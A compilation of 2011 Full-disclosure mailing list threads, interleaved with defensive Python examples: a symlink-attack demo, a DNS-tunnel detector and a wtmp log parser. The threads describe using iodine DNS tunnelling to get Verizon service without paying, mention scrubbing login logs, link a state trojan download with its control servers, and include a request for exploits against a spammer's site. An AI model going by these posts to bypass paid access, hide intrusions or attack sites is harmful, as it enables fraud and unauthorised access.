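    flags = os.O_WRONLY | os.O_CREAT | os.O_EXCL | getattr(os, "O_NOFOLLOW", 0)
    fd = os.open(path, flags, mode)
    return os.fdopen(fd, "w")


def naive_create(path):
    """The pattern symlink attacks rely on: open() follows whatever sits at the name."""
    return open(path, "w")


def run_scenario(workdir=None):
    """Plant a symlink at a predictable name in a private scratch directory and
    compare the two creators. Returns the observations as a dict."""
    workdir = workdir or tempfile.mkdtemp(prefix="symlink-demo-")
    victim = os.path.join(workdir, "victim.conf")   # a file the writer should never touch
    planted = os.path.join(workdir, "app.tmp")      # the predictable temp name
    with open(victim, "w") as f:
        f.write("original\n")
    os.symlink(victim, planted)                     # constructed attacker state

    with naive_create(planted) as f:                # follows the link
        f.write("clobbered\n")
    with open(victim) as f:
        after_naive = f.read().strip()

    with open(victim, "w") as f:                    # reset the victim
        f.write("original\n")
    try:
        with safe_create(planted) as f:
            f.write("clobbered\n")
        safe_refused = False
    except OSError:                                 # EEXIST or ELOOP, depending on platform
        safe_refused = True
    with open(victim) as f:
        after_safe = f.read().strip()

    # The recommended pattern: unpredictable name + O_EXCL, done for you by mkstemp,
    # which also creates the file mode 0600.
    fd, tmp_path = tempfile.mkstemp(dir=workdir)
    os.close(fd)
    mode = stat.S_IMODE(os.stat(tmp_path).st_mode)

    return {"after_naive": after_naive, "safe_refused": safe_refused,
            "after_safe": after_safe, "mkstemp_mode": mode}


if __name__ == "__main__":
    print(run_scenario())
```

The scratch directory from mkdtemp is mode 0700 and not sticky, so the kernel's protected_symlinks restriction does not interfere with the naive case; in a real world-writable /tmp that sysctl is one more layer, not a substitute for O_EXCL.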

Re: [Full-disclosure] Meet the Guy Who Snitched on Occupy Wall Street to the FBI and NYPD

2011-10-16 Thread James Condron

On 17 Oct 2011, at 00:58, Laurelai wrote:

> On 10/16/2011 6:55 PM, James Condron wrote:
>>> You realize most of the protesters aren't a part of Anonymous at all, right?
>> If not all of them; it's hard work putting jeans and a t-shirt on and leaving 
>> the house.
>> 
>> Certainly without charging your motorised scooter and bringing a couple of 
>> hours' supply of pork scratchings.
>> 
>> Anonymous have become the new bogeyman; let's remember who these people are 
>> and calm the fuck down. They're a threat, sure, but no more than a fly 
>> landing on your lunch.
> I have to agree that people have overblown the threat that Anon is, but 
> of course there's a lot of money to be made in scaring the crap out of 
> people.
> 

This is true, and it's what keeps me in a job. I think we can, of course, all 
agree both that Anonymous is heavily overblown and that Thomas Ryan is a bit of 
a tit.

In other news, look out for my interview on CNN talking about how I gained 
access to a series of security mailing lists by simply signing up.

$eyes->roll()




Re: [Full-disclosure] Meet the Guy Who Snitched on Occupy Wall Street to the FBI and NYPD

2011-10-16 Thread James Condron

> You realize most of the protesters aren't a part of Anonymous at all, right?

If not all of them; it's hard work putting jeans and a t-shirt on and leaving the 
house.

Certainly without charging your motorised scooter and bringing a couple of 
hours' supply of pork scratchings.

Anonymous have become the new bogeyman; let's remember who these people are and 
calm the fuck down. They're a threat, sure, but no more than a fly landing on 
your lunch.


Re: [Full-disclosure] Possible German Governmental Backdoor found ("R2D2")

2011-10-09 Thread james
It has some valid uses for sure. Well, the Skype ID harvesting and sound 
recording can be used for counter-intelligence/terrorism operations.

But that's just theory.



On Mon, 10 Oct 2011 09:51:24 +1100, xD 0x41  wrote:
> Interesting... although that archive seems corrupt... I'd like to see
> a bit more about this but, very interesting indeed.. especially Skype id
> harvesting, what could this be for.
> hrms
> xd
>
> On 10 October 2011 07:13,  wrote:
>> On Sun, 9 Oct 2011 16:31:53 +0200, You Got Pwned wrote:
>>> Hi List,
>>>
>>> I thought this could be interesting. My English is not very good so I
>>> copied the following information from F-Secure
>>> (http://www.f-secure.com/weblog/archives/2249.html)
>>>
>>> "Chaos Computer Club from Germany has tonight announced that they
>>> have located a backdoor trojan used by the German Government.
>>>
>>> The announcement was made public on ccc.de (http://www.ccc.de/) with a
>>> detailed 20-page analysis of the functionality of the malware. Download
>>> the report in PDF (in German):
>>> http://www.ccc.de/system/uploads/76/original/staatstrojaner-report23.pdf
>>>
>>> The malware in question is a Windows backdoor consisting of a DLL and
>>> a kernel driver.
>>>
>>> The backdoor includes a keylogger that targets certain applications.
>>> These applications include FIREFOX, SKYPE, MSN MESSENGER, ICQ and
>>> others.
>>>
>>> The backdoor also contains code intended to take screenshots and
>>> record audio, including recording Skype calls.
>>>
>>> In addition, the backdoor can be remotely updated. Servers that it
>>> connects to include 83.236.140.90 and 207.158.22.134"
>>>
>>> According to CCC Germany the backdoor could also be exploited by
>>> third parties. You can download it from
>>> http://www.ccc.de/system/uploads/77/original/0zapftis-release.tgz
>>> You'll need gzip and tar to get the .dll and the .sys file.
>>
>> I was looking at this just late last night.


Re: [Full-disclosure] Possible German Governmental Backdoor found ("R2D2")

2011-10-09 Thread james
On Sun, 9 Oct 2011 16:31:53 +0200, You Got Pwned wrote:
> Hi List,
>
> I thought this could be interesting. My English is not very good so I
> copied the following information from F-Secure
> (http://www.f-secure.com/weblog/archives/2249.html)
>
> "Chaos Computer Club from Germany has tonight announced that they
> have located a backdoor trojan used by the German Government.
>
> The announcement was made public on ccc.de (http://www.ccc.de/) with a
> detailed 20-page analysis of the functionality of the malware. Download
> the report in PDF (in German):
> http://www.ccc.de/system/uploads/76/original/staatstrojaner-report23.pdf
>
> The malware in question is a Windows backdoor consisting of a DLL and
> a kernel driver.
>
> The backdoor includes a keylogger that targets certain applications.
> These applications include FIREFOX, SKYPE, MSN MESSENGER, ICQ and
> others.
>
> The backdoor also contains code intended to take screenshots and
> record audio, including recording Skype calls.
>
> In addition, the backdoor can be remotely updated. Servers that it
> connects to include 83.236.140.90 and 207.158.22.134"
>
> According to CCC Germany the backdoor could also be exploited by
> third parties. You can download it from
> http://www.ccc.de/system/uploads/77/original/0zapftis-release.tgz
> You'll need gzip and tar to get the .dll and the .sys file.

I was looking at this just late last night.


Re: [Full-disclosure] Verizon Wireless DNS Tunneling

2011-10-07 Thread James Wright
Actually, yes, they could provide bad data.  I believe (perhaps erroneously)
that Comcast does this.  Probably other service providers do too.  Until you
are authenticated to use their network you are redirected to a service page
that can help authenticate you.  If you have connectivity issues (like bad
cached DNS entries) after authenticating you are to reboot (or otherwise
clear the local DNS cache).

I don't really see why Verizon could not do similar.  All DNS traffic from
an unauthenticated user/machine would be redirected to a DNS server that
only returned the appropriate service page.  Most or all other traffic would
be blocked.  Much like NAC.


Thanks,
James


On Fri, Oct 7, 2011 at 10:05 AM, Dan Kaminsky  wrote:

> One major reason it sticks around is -- what are you supposed to do, return
> bad data until the user is properly logged in?  It might get cached -- and
> while operating systems respect TTL, browsers most assuredly do not ("well,
> it MIGHT take us somewhere good").
>
> It's not like there's a magic off switch that makes this go away.
>
> On Fri, Oct 7, 2011 at 4:56 AM, Marshall Whittaker <
> marshallwhitta...@gmail.com> wrote:
>
>> Yes, I've found that DNS tunneling works well at the college I go to on
>> their WIFI.  I've never gotten ICMP tunneling to work myself (outside of a
>> virtual machine),  but I have some code laying around somewhere that can do
>> it just in case I need it for something sometime.  Just thought it would be
>> interesting to some people that it works on such a large provider as
>> Verizon.  The only problem with it that I see is that it's quite slow.  But
>> if it works, so be it.  Good for checking email and browsing the web and
>> such on the road.  But I wouldn't try to torrent a linux distro with it,
>> haha.
>>
>> --oxagast
>>
>> On Fri, Oct 7, 2011 at 7:39 AM, BH  wrote:
>>
>>>  This comes in handy when travelling, I also found a few places where
>>> ICMP tunnelling works well.
>>>
>>>
>>> On 7/10/2011 6:35 PM, Dan Kaminsky wrote:
>>>
>>> Works mostly everywhere.  It's apparently enough of a pain in the butt to
>>> deal with, and abused so infrequently, that it's left alone.
>>>
>>> On Fri, Oct 7, 2011 at 3:32 AM, Marshall Whittaker <
>>> marshallwhitta...@gmail.com> wrote:
>>>
>>>> I recently noticed that you can tunnel TCP through DNS (I used iodine)
>>>> to penetrate Verizon Wireless' firewall.  You can connect, and if you can
>>>> hold the connection long enough to make a DNS tunnel, then the connection
>>>> stays up, then use SSH -D to create a proxy server for your traffic. Bottom
>>>> line is, you can use the internet without paying. I made a video of it.  It
>>>> can be seen here:
>>>> http://www.youtube.com/user/Oxagast?blend=2&ob=5#p/u/0/X6oWESQMVd8 I
>>>> tried to contact Verizon on their security blog about it a few weeks ago at
>>>> http://securityblog.verizonbusiness.com/ however, I have not had a
>>>> response.  This technique still works as of this posting.  Maybe this will
>>>> help them get their act together ;-)
>>>>
>>>>  --oxagast
>>>>
>>>>
>>>
>>>
>>>
>>>
>>>
>>>
>>>
>>
>>
>>
>
>
>
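The message quoted at the bottom of this thread is about iodine-style DNS tunnelling through a carrier's captive network. As an added example, not code from anyone in this thread, here is the kind of detector a network defender would run over resolver query logs to spot that traffic: it profiles each (client, base domain) pair for the features tunnels share (a fresh subdomain per query, long high-entropy leftmost labels, payload-carrying record types) and flags pairs that show at least two of them. The log line format, the thresholds and the sample lines are constructed for the example; the base-domain guess of "last two labels" is a simplification a real deployment would replace with a public-suffix list.

```python
import base64
import hashlib
import math
import re
from collections import Counter, defaultdict

# BIND-style query log line (constructed format for this example).
LOG_RE = re.compile(r"client (?P<ip>[\d.]+)#\d+: query: (?P<qname>\S+) IN (?P<qtype>[A-Z]+)")

# Record types tunnelling tools favour because they carry the most payload.
PAYLOAD_TYPES = {"NULL", "TXT", "CNAME", "SRV"}


def shannon_entropy(s):
    """Bits per character of the string; random-looking encodings score high."""
    if not s:
        return 0.0
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in Counter(s).values())


def base_domain(qname):
    """Crude registrable-domain guess: the last two labels (assumption for this example)."""
    labels = qname.rstrip(".").split(".")
    return ".".join(labels[-2:])


def profile_queries(lines):
    """Aggregate per (client, base domain) the features that separate tunnels from browsing."""
    stats = defaultdict(lambda: {"queries": 0, "names": set(), "payload_types": 0,
                                 "label_len": 0, "entropy": 0.0})
    for line in lines:
        m = LOG_RE.search(line)
        if not m:
            continue
        qname = m.group("qname").rstrip(".")
        first_label = qname.split(".")[0]
        s = stats[(m.group("ip"), base_domain(qname))]
        s["queries"] += 1
        s["names"].add(qname)
        s["payload_types"] += m.group("qtype") in PAYLOAD_TYPES
        s["label_len"] += len(first_label)
        s["entropy"] += shannon_entropy(first_label)
    return stats


def detect_tunnels(lines, min_queries=5):
    """Return [(ip, domain, reasons)] for pairs showing at least two tunnel indicators."""
    findings = []
    for (ip, domain), s in sorted(profile_queries(lines).items()):
        n = s["queries"]
        if n < min_queries:
            continue
        reasons = []
        if len(s["names"]) / n > 0.9:
            reasons.append("almost every query is a never-seen subdomain")
        if s["label_len"] / n > 30:
            reasons.append("very long leftmost labels")
        if s["entropy"] / n > 3.5:
            reasons.append("high-entropy labels")
        if s["payload_types"] / n > 0.5:
            reasons.append("mostly payload-carrying record types")
        if len(reasons) >= 2:
            findings.append((ip, domain, reasons))
    return findings


def _fake_payload_label(i):
    """Deterministic random-looking label standing in for tunnel-encoded data (constructed)."""
    digest = hashlib.sha256(str(i).encode()).digest()
    return base64.b32encode(digest).decode().lower().rstrip("=")[:40]


# Constructed sample log: eight ordinary lookups from one client, eight
# tunnel-shaped queries from another.
SAMPLE_LOG = [
    f"client 10.0.0.7#5123{i}: query: {name} IN {qtype}"
    for i, (name, qtype) in enumerate([
        ("www.example.com", "A"), ("mail.example.com", "A"),
        ("www.example.com", "AAAA"), ("static.example.com", "A"),
        ("www.example.com", "A"), ("mail.example.com", "A"),
        ("static.example.com", "A"), ("www.example.com", "A")])
] + [
    f"client 10.0.0.5#4412{i}: query: {_fake_payload_label(i)}.t.example.net IN {'NULL' if i % 2 else 'TXT'}"
    for i in range(8)
]


if __name__ == "__main__":
    for ip, domain, reasons in detect_tunnels(SAMPLE_LOG):
        print(ip, domain, "; ".join(reasons))
```

Per-pair query rate over a time window is the other indicator worth adding on real data; it is left out here because the constructed lines carry no timestamps.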

Re: [Full-disclosure] Verizon Wireless DNS Tunneling

2011-10-07 Thread James Wright
I wouldn't say I blindly clicked it, but truth be told, I was not overly
concerned about it (annoyed, but not concerned).  The machine gets wiped and
reinstalled every few months, doing so does not disable my Internet access.
It is dedicated to another purpose, it's not for email, banking, etc.
Sometimes the kids play games on it.  That's about it.  Even my kids have
Linux on their laptops.  Thanks for assuming otherwise, I appreciate your
concern about my home network :)

Why all the hate on Comcast?  I see this a lot on various lists, and besides
their DNS servers being flaky at times (I stopped using their DNS servers
long ago because of this), I personally have not had trouble with them.
Even bittorrent works (gasp) using default settings.  Are they just too big
to be loved?  :)


Thanks,
James


On Fri, Oct 7, 2011 at 10:53 AM,  wrote:

> On Fri, 07 Oct 2011 10:47:13 EDT, Terrence said:
>
> > To the guy saying that comcast requires an executable to authenticate you.
> > Ha. You should prolly wipe your install.
>
> And that's true even if you actually trusted the Comcast binary.  If they were
> able to get a binary to get run, probably others have as well.  It either got
> automatically run by the browser without your intervention, or it *did* prompt
> for execution and you (probably blindly) said "OK".  Either way, you're probably
> pwned by something else that got run the exact same way the Comcast binary did.
>
> Thanks for nothing, Comcast.  At least we've finally gotten most banks to not
> send out phishy-looking email.
>

Re: [Full-disclosure] Verizon Wireless DNS Tunneling

2011-10-07 Thread James Wright
Why do you say that?  I don't doubt that there are other ways, but it has
been that way for a while, I've used them as my home ISP for a few years
now.  I don't prefer that method, but you can remove their program after and
you do not lose connectivity or anything.  It just validates your account
number with Comcast and sets your DNS (probably fiddles with other settings
too, not really concerned about it).


Valdis, I have exactly 1 Windows machine, dedicated for something else, but
it came in handy when I last moved.  I would imagine that I could get the
link working via a phone call to support.


Thanks,
James


On Fri, Oct 7, 2011 at 10:47 AM, Terrence  wrote:

> To the guy saying that comcast  requires an executable to authenticate you.
> Ha. You should prolly wipe your install.
> On Oct 7, 2011 10:41 AM,  wrote:
>
>> On Fri, 07 Oct 2011 10:36:39 EDT, James Wright said:
>>
>> > That would probably explain why the Comcast service page downloads an
>> > executable to authenticate you.  At that point they have control over the
>> > end user's machine and can either clear the DNS cache or force a reboot.
>>
>> That must suck if you're a non-Windows user. ;)
>>
>>
>

Re: [Full-disclosure] Verizon Wireless DNS Tunneling

2011-10-07 Thread James Wright
That would probably explain why the Comcast service page downloads an
executable to authenticate you.  At that point they have control over the
end user's machine and can either clear the DNS cache or force a reboot.

Their (Comcast, other traditional ISPs') authentication is a bit static and
works until real service disruption, which is generally rare.  Though it
would seem that Verizon would do similar.  Either the phone is a paid data
subscriber or it is not.  If not, all traffic is blocked or DNS is
hijacked to display the reason for non-Internet connectivity.

I do not know their system though, so I could be overly simplifying this.


Thanks,
James


On Fri, Oct 7, 2011 at 10:31 AM, Dan Kaminsky  wrote:

> Yeah, the problem is the bad data doesn't flush after authentication.  So
> you try to go to Google, you're redirected to 10.0.0.1, you get
> authenticated, but the browser still tries to go to 10.0.0.1.  You try
> handling those support calls.  So instead most places give you real DNS, and
> hijack at IP/TCP.
>
> On Fri, Oct 7, 2011 at 7:26 AM, James Wright  wrote:
>
>> Actually, yes, they could provide bad data.  I believe (perhaps
>> erroneously) that Comcast does this.  Probably other service providers do
>> too.  Until you are authenticated to use their network you are redirected to
>> a service page that can help authenticate you.  If you have connectivity
>> issues (like bad cached DNS entries) after authenticating you are to reboot
>> (or otherwise clear the local DNS cache).
>>
>> I don't really see why Verizon could not do similar.  All DNS traffic from
>> an unauthenticated user/machine would be redirected to a DNS server that
>> only returned the appropriate service page.  Most or all other traffic would
>> be blocked.  Much like NAC.
>>
>>
>> Thanks,
>> James
>>
>>
>>
>> On Fri, Oct 7, 2011 at 10:05 AM, Dan Kaminsky  wrote:
>>
>>> One major reason it sticks around is -- what are you supposed to do,
>>> return bad data until the user is properly logged in?  It might get cached
>>> -- and while operating systems respect TTL, browsers most assuredly do not
>>> ("well, it MIGHT take us somewhere good").
>>>
>>> It's not like there's a magic off switch that makes this go away.
>>>
>>> On Fri, Oct 7, 2011 at 4:56 AM, Marshall Whittaker <
>>> marshallwhitta...@gmail.com> wrote:
>>>
>>>> Yes, I've found that DNS tunneling works well at the college I go to on
>>>> their WIFI.  I've never gotten ICMP tunneling to work myself (outside of a
>>>> virtual machine),  but I have some code laying around somewhere that can do
>>>> it just in case I need it for something sometime.  Just thought it would be
>>>> interesting to some people that it works on such a large provider as
>>>> Verizon.  The only problem with it that I see is that it's quite slow.  But
>>>> if it works, so be it.  Good for checking email and browsing the web and
>>>> such on the road.  But I wouldn't try to torrent a linux distro with it,
>>>> haha.
>>>>
>>>> --oxagast
>>>>
>>>> On Fri, Oct 7, 2011 at 7:39 AM, BH  wrote:
>>>>
>>>>>  This comes in handy when travelling, I also found a few places where
>>>>> ICMP tunnelling works well.
>>>>>
>>>>>
>>>>> On 7/10/2011 6:35 PM, Dan Kaminsky wrote:
>>>>>
>>>>> Works mostly everywhere.  It's apparently enough of a pain in the butt
>>>>> to deal with, and abused so infrequently, that it's left alone.
>>>>>
>>>>> On Fri, Oct 7, 2011 at 3:32 AM, Marshall Whittaker <
>>>>> marshallwhitta...@gmail.com> wrote:
>>>>>
>>>>>> I recently noticed that you can tunnel TCP through DNS (I used iodine)
>>>>>> to penetrate Verizon Wireless' firewall.  You can connect, and if you can
>>>>>> hold the connection long enough to make a DNS tunnel, then the connection
>>>>>> stays up, then use SSH -D to create a proxy server for your traffic. 
>>>>>> Bottom
>>>>>> line is, you can use the internet without paying. I made a video of it.  
>>>>>> It
>>>>>> can be seen here:
>>>>>> http://www.youtube.com/user/Oxagast?blend=2&ob=5#p/u/0/X6oWESQMVd8 I
>>>>>> tried to contact Verizon on their security blog about it a few weeks ago 
>>>>>> at
>>>

Re: [Full-disclosure] VPN provider helped track down alleged LulzSec member

2011-09-29 Thread James Condron

On 29 Sep 2011, at 14:04, valdis.kletni...@vt.edu wrote:

> On Thu, 29 Sep 2011 13:53:03 BST, Benji said:
> 
>> Just because something is advertised as 'anonymous' doesn't mean it's 'so
>> anonymous you can break the law' and anyone using an EU/US-related country to
>> do this is either stupid or naive.
> 
> There's also those servers that advertise "anonymous and likely to stay that
> way because we've bought a few corrupt government officials".  But if you're
> buying services from them, you're neither stupid nor naive, and know 
> *exactly*
> why you're doing business with them

Yep, you're buying a service from someone who can then, by extension, be bought 
themselves. There's no money in buying off officials; it's coming from somewhere, 
usually the highest bidder.

Sounds pretty naive to me.

> 



Re: [Full-disclosure] sshd logins without a source

2011-09-23 Thread james
Guys,

Let's not complicate this.

OP: that looks like a line from /var/log/secure - this file only logs sessions, 
escalation and setuids, not IPs. It is useful, in this situation, for tracing.

What do /var/log/[b|w]tmp tell you? Use the last command.

If this has been scrubbed then fine; these files can be scrubbed with a simple 
Perl two-liner, or rm'd completely.

Cheers.

Sent from my BlackBerry® wireless device

-Original Message-
From: Bacanu Adrian-Daniel 
Sender: full-disclosure-boun...@lists.grok.org.uk
Date: Fri, 23 Sep 2011 03:05:51 
To: BH; 
full-disclosure@lists.grok.org.uk
Reply-To: Bacanu Adrian-Daniel 
Subject: Re: [Full-disclosure] sshd logins without a source

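The advice above is to read wtmp/btmp rather than trust the text log. As an added example, not code from anyone in this thread, here is a parser for the binary wtmp format that pulls out exactly the two things an investigator wants in this situation: USER_PROCESS entries on a pseudo-terminal that carry neither a hostname nor an address (the "login without a source"), and all-zero records, which is what a crude scrubber leaves behind. The record layout is glibc's struct utmp on x86_64/i386 (384 bytes, int32 timestamp), which is an assumption for this example; the wtmp bytes are constructed in the block, not taken from a real system.

```python
import socket
import struct
from datetime import datetime, timezone

# struct utmp as laid out by glibc on x86_64 and i386 (384 bytes). Assumption for
# this example; check <bits/utmp.h> on other platforms.
UTMP_FMT = "<hxxi32s4s32s256shhiii4i20x"
UTMP_SIZE = struct.calcsize(UTMP_FMT)   # 384
USER_PROCESS, DEAD_PROCESS = 7, 8


def _cstr(field):
    """NUL-terminated fixed-width char array to str."""
    return field.split(b"\0", 1)[0].decode("utf-8", "replace")


def _addr(words):
    """ut_addr_v6 holds an IPv4 address in words[0] or a full IPv6 address."""
    if not any(words):
        return ""
    raw = struct.pack("<4i", *words)
    if not any(words[1:]):
        return socket.inet_ntoa(raw[:4])
    return socket.inet_ntop(socket.AF_INET6, raw)


def parse_wtmp(data):
    """Decode every record; all-zero records are reported, not skipped."""
    records = []
    for off in range(0, len(data) - UTMP_SIZE + 1, UTMP_SIZE):
        chunk = data[off:off + UTMP_SIZE]
        if chunk == b"\0" * UTMP_SIZE:
            records.append({"offset": off, "zeroed": True})
            continue
        (ut_type, pid, line, ident, user, host, _term, _exit, _session,
         tv_sec, _tv_usec, a0, a1, a2, a3) = struct.unpack(UTMP_FMT, chunk)
        records.append({
            "offset": off, "zeroed": False, "type": ut_type, "pid": pid,
            "line": _cstr(line), "id": _cstr(ident), "user": _cstr(user),
            "host": _cstr(host), "addr": _addr((a0, a1, a2, a3)),
            "time": datetime.fromtimestamp(tv_sec, tz=timezone.utc).isoformat(),
        })
    return records


def sourceless_logins(records):
    """USER_PROCESS entries on a pty with neither ut_host nor ut_addr set.
    Console/tty logins legitimately have no source, so they are left out."""
    return [r for r in records if not r["zeroed"] and r["type"] == USER_PROCESS
            and r["line"].startswith("pts/") and not r["host"] and not r["addr"]]


def zeroed_records(records):
    """Records wiped to zeros in place, the footprint of a simple log cleaner."""
    return [r for r in records if r["zeroed"]]


def make_record(ut_type, pid, line, ident, user, host, ts, ipv4=""):
    """Build one record the way login(1)/sshd would (constructed sample data)."""
    a0 = struct.unpack("<i", socket.inet_aton(ipv4))[0] if ipv4 else 0
    return struct.pack(UTMP_FMT, ut_type, pid, line.encode(), ident.encode(),
                       user.encode(), host.encode(), 0, 0, 0, ts, 0, a0, 0, 0, 0)


def sample_wtmp():
    """Constructed wtmp: a normal SSH login, an SSH login with no source, a
    console login, and one zeroed record (203.0.113.0/24 is a documentation net)."""
    t = 1316764800  # 2011-09-23T08:00:00Z
    return b"".join([
        make_record(USER_PROCESS, 2101, "pts/0", "ts/0", "alice", "203.0.113.7", t, "203.0.113.7"),
        make_record(USER_PROCESS, 2150, "pts/1", "ts/1", "root", "", t + 60),
        make_record(USER_PROCESS, 1802, "tty1", "tty1", "bob", "", t + 120),
        b"\0" * UTMP_SIZE,
    ])


if __name__ == "__main__":
    recs = parse_wtmp(sample_wtmp())
    for r in sourceless_logins(recs):
        print("no source:", r["user"], r["line"], r["time"])
    print("zeroed records:", len(zeroed_records(recs)))
```

To run it on a real file, replace sample_wtmp() with the bytes of /var/log/wtmp (btmp has the same layout); an in-place scrub also tends to leave the record count unchanged while the file's mtime no longer matches the last record's timestamp, which is a cheap second check.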


[Full-disclosure] Another minor facebook security flaw

2011-09-20 Thread James Fife
I noticed a recent flaw in Facebook's security resolution process recently. 
After being asked to confirm my identity simply because I was using a different 
computer, I apparently took too long to identify my friends in their photos. 
However, I was able to try two more times before being locked out, in which 
case Facebook provided the exact same photos with the same selection of people 
to name in order to confirm my identity. What this means is that I could 
conceivably attempt to log on to a victim's Facebook account from an unauthorized 
device to get such a prompt, and then take my time to research the answers. 
Twenty minutes was the approximate time before my session expired, which gives 
roughly one hour to come up with the answers. This may not seem terribly 
difficult given the proclivity with which people tag their friends or publish 
photos on blogs. It would be even easier if the victim and attacker had a mutual 
friend in common on Facebook, as they would likely be able to see a lot more 
photos. In fact, perhaps even searching each name in Facebook could show the 
face, which would allow for the questions to be answered correctly. This isn't a 
minor flaw in any sense of the word; however, it does seem quite possible that 
the process as it is now implemented could be abused in conjunction with other 
vulnerabilities to gain access to someone's account. I hope that at the least 
this will foster some interesting discussion on why what I have described is a 
non-issue, or result in a fix.

Taken from: 
http://allthatiswrong.wordpress.com/2011/09/19/another-minor-facebook-security-issue/

Re: [Full-disclosure] Cybsec Advisory 2011 0901 Windows Script Host DLL Hijacking

2011-09-04 Thread James Condron
Paul,

I only run windows on one machine, my workstation in the office, so my results 
aren't indicative of every system- indeed this may be a quirk of our AD, in 
which case I'll be talking to one of my colleagues with my friend Mr. Crowbar, 
but both extensions you list were executable.

Admittedly I haven't checked all of the others yet, mileage may vary.

Either way there is no accounting for taste; some cases will make this less an 
attack in and of itself and more will show this as a further social 
engineering payload, albeit one which requires tricking someone into downloading 
several layers of code and still executing it.

On 4 Sep 2011, at 23:54, paul.sz...@sydney.edu.au wrote:

>> Application: wscript.exe
>> Extensions: js, jse, vbe, vbs, wsf, wsh
>> Library: wshesn.dll
> 
> Many people commented that the above extensions are "executable"
> already, so are (should be) treated with caution, or that they
> can be trojaned directly without any DLL load shenanigans.
> 
> However... looking at
> http://technet.microsoft.com/en-us/library/cc288335%28office.12%29.aspx
> http://office.microsoft.com/en-us/windows-sharepoint-services-help/types-of-files-that-cannot-be-added-to-a-list-or-library-HA010100147.aspx
> I do not see JS listed as executable, though JSE is listed.
> 
> Looking at
> http://msdn.microsoft.com/en-us/library/ms722429.aspx
> I see JS (but not JSE) listed. Checking secpol.msc on my WindowsXP
> machine, none of the above extensions are "designated".
> 
> Maybe DLL hijacking is useful for some of these file types, after all?
> 
> Cheers, Paul
> 
> Paul Szabo   p...@maths.usyd.edu.au   http://www.maths.usyd.edu.au/u/psz/
> School of Mathematics and Statistics   University of SydneyAustralia
> 



Re: [Full-disclosure] http://www.bestcareersopportunities.com/

2011-08-31 Thread James Voss
Find another list to cry to.

We don't deal with things like that here.

Sent from my Verizon Wireless BlackBerry

-Original Message-
From: Jacqui Caren-home 
Sender: full-disclosure-boun...@lists.grok.org.uk
Date: Wed, 31 Aug 2011 07:30:22 
To: 
Subject: [Full-disclosure] http://www.bestcareersopportunities.com/

is running wordpress 3.2.1

This Lahore-based spammer is running a PPC link blog and is pushing his crap
all over the social networks right now and has just appeared in my work
spamtraps from botnet'd systems.

Anyone know if the above site has any known exploits?

Note the hosting company has been notified, so expect any attacks/tests to be 
monitored.

Jacqui




Re: [Full-disclosure] Paper - Dissecting Java Server Faces for Penetration Testing

2011-08-26 Thread James Rankin
Er... on the end of the link, maybe?

On 26 August 2011 14:39, Saleh  wrote:

> On 08/26/2011 05:18 AM, SecNiche Security Labs wrote:
> > Hi
> >
> > This paper sheds light on the findings of security testing of Java
> > Server Faces. JSF has been widely used as an open source web framework
> > for developing efficient applications using J2EE. JSF is compared with
> > ASP.NET framework to unearth potential security flaws.
> >
> > Link : http://www.secniche.org/jsf/dissecting_jsf_pt_aks_kr.pdf
> >
> > Aditya K Sood
> > SecNiche Security Labs
> > http://www.secniche.org
> >
> Where's the paper?
>
> --
> Saleh Alsanad
> PACI computer engineer
> q8mos...@gmail.com
> I'm an FSF member -- Help us support software freedom!
> http://www.fsf.org/jf?referrer=2442
>
>



-- 
"On two occasions...I have been asked, 'Pray, Mr Babbage, if you put into
the machine wrong figures, will the right answers come out?' I am not able
rightly to apprehend the kind of confusion of ideas that could provoke such
a question."

** IMPORTANT INFORMATION/DISCLAIMER *

This document should be read only by those persons to whom it is addressed.
If you have received this message it was obviously addressed to you and
therefore you can read it, even it we didn't mean to send it to you.
However, if the contents of this email make no sense whatsoever then you
probably were not the intended recipient, or, alternatively, you are a
mindless cretin; either way, you should immediately kill yourself and
destroy your computer (not necessarily in that order). Once you have taken
this action, please contact us.. no, sorry, you can't use your computer,
because you just destroyed it, and possibly also committed suicide
afterwards, but I am starting to digress.. *

* The originator of this email is not liable for the transmission of the
information contained in this communication. Or are they? Either way it's a
pretty dull legal query and frankly one I'm not going to dwell on. But
should you have nothing better to do, please feel free to ruminate on it,
and please pass on any concrete conclusions should you find them. However,
if you pass them on via email, be sure to include a disclaimer regarding
liability for transmission.
*

* In the event that the originator did not send this email to you, then
please return it to us and attach a scanned-in picture of your mother's
brother's wife wearing nothing but a kangaroo suit, and we will immediately
refund you exactly half of what you paid for the can of Whiskas you bought
when you went to Pets** ** At Home yesterday. *

* We take no responsibility for non-receipt of this email because we are
running Exchange 5.5 and everyone knows how glitchy that can be. In the
event that you do get this message then please note that we take no
responsibility for that either. Nor will we accept any liability, tacit or
implied, for any damage you may or may not incur as a result of receiving,
or not, as the case may be, from time to time, notwithstanding all
liabilities implied or otherwise, ummm, hell, where was I...umm, no matter
what happens, it is NOT, and NEVER WILL BE, OUR FAULT! *

* The comments and opinions expressed herein are my own and NOT those of my
employer, who, if he knew I was sending emails and surfing the seamier side
of the Internet, would cut off my manhood and feed it to me for afternoon
tea. *

[Full-disclosure] CA20110809-01: Security Notice for CA ARCserve D2D

2011-08-10 Thread Williams, James K
 
CA20110809-01: Security Notice for CA ARCserve D2D

Issued: August 9, 2011

CA Technologies support is alerting customers to a security risk 
associated with CA ARCserve D2D. A vulnerability exists that can 
allow a remote attacker to access credentials and execute arbitrary 
commands.  CA Technologies has issued a patch to address the 
vulnerability.

The vulnerability, CVE-2011-3011, is due to improper session handling. 
A remote attacker can access credentials and execute arbitrary 
commands.

Risk Rating

High

Platform

Windows

Affected Products

CA ARCserve D2D r15

How to determine if the installation is affected

Search under the TOMCAT directory for "BaseServiceImpl.class"; if the 
file's date is earlier than August 03, 2011, then you should apply fix 
RO33517.

Solution

CA has issued a patch to address the vulnerability.

CA ARCserve D2D r15:
RO33517

Workaround

None

References

CVE-2011-3011 - CA ARCserve D2D session handling vulnerability

Acknowledgement

None

Change History

Version 1.0: Initial Release

If additional information is required, please contact CA Technologies 
Support at support.ca.com

If you discover a vulnerability in a CA Technologies product, please 
report your findings to the CA Technologies Product Vulnerability 
Response Team.
support.ca.com/irj/portal/anonymous/phpsupcontent?contentID=177782

Thanks and regards,
Ken Williams, Director
ca technologies Product Vulnerability Response Team
ca technologies Business Unit Operations
wilja22 @ ca.com

Re: [Full-disclosure] URL Spoofing vulnerability in different browsers

2011-07-23 Thread James Voss
Lol, okay

-- 
Regards,

James Voss 
LinkedIn: http://www.linkedin.com/in/jameswvoss
312-000- - Direct
847-000- - Fax

PRIVILEGED AND CONFIDENTIAL: This communication, including attachments, is
